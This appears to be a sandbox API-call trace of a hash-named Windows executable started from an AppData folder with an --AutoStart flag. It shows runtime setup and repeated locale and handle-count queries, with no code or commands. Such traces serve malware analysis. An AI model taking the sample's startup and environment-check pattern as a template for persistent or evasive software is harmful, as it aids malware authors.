[0163.794] GetCurrentProcessId () returned 0x778 [0163.794] GetCurrentThreadId () returned 0x77c [0163.794] GetTickCount () returned 0x9c2d [0163.794] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=1622446054976) returned 1 [0163.794] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x49ed00)) [0163.794] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0163.794] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x4060000 [0163.796] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76680000 [0163.796] GetProcAddress (hModule=0x76680000, lpProcName="FlsAlloc") returned 0x76694ee3 [0163.796] GetProcAddress (hModule=0x76680000, lpProcName="FlsGetValue") returned 0x76691252 [0163.796] GetProcAddress (hModule=0x76680000, lpProcName="FlsSetValue") returned 0x766941c0 [0163.796] GetProcAddress (hModule=0x76680000, lpProcName="FlsFree") returned 0x7669354f [0163.797] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x214) returned 0x40607d0 [0163.798] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76680000 [0163.798] GetCurrentThreadId () returned 0x77c [0163.798] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x49a5e6, hStdOutput=0x49a91f, hStdError=0x40607d0)) [0163.798] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x800) returned 0x40609f0 [0163.798] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0163.798] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0163.798] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0163.798] SetHandleCount (uNumber=0x20) returned 0x20 [0163.798] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --AutoStart" [0163.798] GetEnvironmentStringsW () returned 0x2632108* [0163.798] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x0, Size=0xb46) returned 0x40611f8 [0163.801] FreeEnvironmentStringsW (penv=0x2632108) returned 1 [0163.801] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x252b980, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe")) returned 0x8a [0163.801] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x0, Size=0x13a) returned 0x4061d48 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x9c) returned 0x4061e90 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x3e) returned 0x4061f38 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x56) returned 0x4061f80 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x6e) returned 0x4061fe8 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x78) returned 0x4062060 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x62) returned 0x40620e0 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x30) returned 0x4062150 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x48) returned 0x4062188 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x28) returned 0x40621d8 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x1a) returned 0x4062208 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x34) returned 0x4062230 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x5c) returned 0x4062270 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x32) returned 0x40622d8 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x2e) returned 0x4062318 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x1c) returned 0x4062350 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x12a) returned 0x4062378 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x7c) returned 0x40624b0 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x36) returned 0x4062538 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x3a) returned 0x4062578 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x90) returned 0x40625c0 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x24) returned 0x4062658 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x30) returned 0x4062688 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x36) returned 0x40626c0 [0163.802] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x48) returned 0x4062700 [0163.803] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x52) returned 0x4062750 [0163.803] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x3c) returned 0x40627b0 [0163.803] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0xd6) returned 0x40627f8 [0163.803] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x2e) returned 0x40628d8 [0163.803] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x28) returned 0x4062910 [0163.803] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x1e) returned 0x4062940 [0163.803] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x2c) returned 0x4062968 [0163.803] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x54) returned 0x40629a0 [0163.803] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x52) returned 0x4062a00 [0163.803] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x2c) returned 0x4062a60 [0163.803] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x26) returned 0x4062a98 [0163.803] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x3e) returned 0x4062ac8 [0163.803] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x24) returned 0x4062b10 [0163.803] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x30) returned 0x4062b40 [0163.803] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x8c) returned 0x4062b78 [0163.815] HeapFree (in: hHeap=0x4060000, dwFlags=0x0, lpMem=0x40611f8 | out: hHeap=0x4060000) returned 1 [0163.816] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0163.816] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x80) returned 0x4062c10 [0163.816] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x8, Size=0x800) returned 0x40611f8 [0163.816] GetLastError () returned 0x0 [0163.816] SetLastError (dwErrCode=0x0) [0163.816] GetLastError () returned 0x0 [0163.816] SetLastError (dwErrCode=0x0) [0163.816] GetLastError () returned 0x0 [0163.817] SetLastError (dwErrCode=0x0) [0163.817] GetACP () returned 0x4e4 [0163.817] RtlAllocateHeap (HeapHandle=0x4060000, Flags=0x0, Size=0x220) returned 0x4061a00 [0163.817] GetLastError () returned 0x0 [0163.817] SetLastError (dwErrCode=0x0) [0163.817] IsValidCodePage (CodePage=0x4e4) returned 1 [0163.817] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0163.817] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0163.817] GetLastError () returned 0x0 [0163.817] SetLastError (dwErrCode=0x0) [0163.817] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0163.817] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0163.817] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0163.817] GetLastError () returned 0x0 [0163.817] SetLastError (dwErrCode=0x0) [0163.817] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0163.817] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿೞ擃ᦴJĀ") returned 256 [0163.817] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿೞ擃ᦴJĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0163.817] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿೞ擃ᦴJĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0163.818] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÒ?á \x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0163.818] GetLastError () returned 0x0 [0163.818] SetLastError (dwErrCode=0x0) [0163.818] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0163.818] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿೞ擃ᦴJĀ") returned 256 [0163.818] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿೞ擃ᦴJĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0163.818] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿೞ擃ᦴJĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0163.818] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÒ?á \x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0163.818] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e50b) returned 0x0 [0163.818] RtlSizeHeap (HeapHandle=0x4060000, Flags=0x0, MemoryPointer=0x4062c10) returned 0x80 [0163.819] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76680000 [0163.819] GetCurrentProcess () returned 0xffffffff [0163.820] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.821] GetSystemDefaultLangID () returned 0x2630409 [0163.821] GetThreadLocale () returned 0x409 [0163.821] GetCurrentProcess () returned 0xffffffff [0163.821] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.821] GetSystemDefaultLangID () returned 0x2630409 [0163.821] GetThreadLocale () returned 0x409 [0163.821] GetCurrentProcess () returned 0xffffffff [0163.821] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.821] GetSystemDefaultLangID () returned 0x2630409 [0163.821] GetThreadLocale () returned 0x409 [0163.822] GetCurrentProcess () returned 0xffffffff [0163.822] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.822] GetSystemDefaultLangID () returned 0x2630409 [0163.822] GetThreadLocale () returned 0x409 [0163.822] GetCurrentProcess () returned 0xffffffff [0163.822] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.822] GetSystemDefaultLangID () returned 0x2630409 [0163.822] GetThreadLocale () returned 0x409 [0163.822] GetCurrentProcess () returned 0xffffffff [0163.822] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.822] GetSystemDefaultLangID () returned 0x2630409 [0163.822] GetThreadLocale () returned 0x409 [0163.822] GetCurrentProcess () returned 0xffffffff [0163.822] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.822] GetSystemDefaultLangID () returned 0x2630409 [0163.822] GetThreadLocale () returned 0x409 [0163.822] GetCurrentProcess () returned 0xffffffff [0163.822] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.822] GetSystemDefaultLangID () returned 0x2630409 [0163.822] GetThreadLocale () returned 0x409 [0163.822] GetCurrentProcess () returned 0xffffffff [0163.822] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.822] GetSystemDefaultLangID () returned 0x2630409 [0163.822] GetThreadLocale () returned 0x409 [0163.822] GetCurrentProcess () returned 0xffffffff [0163.822] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.822] GetSystemDefaultLangID () returned 0x2630409 [0163.823] GetThreadLocale () returned 0x409 [0163.823] GetCurrentProcess () returned 0xffffffff [0163.823] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 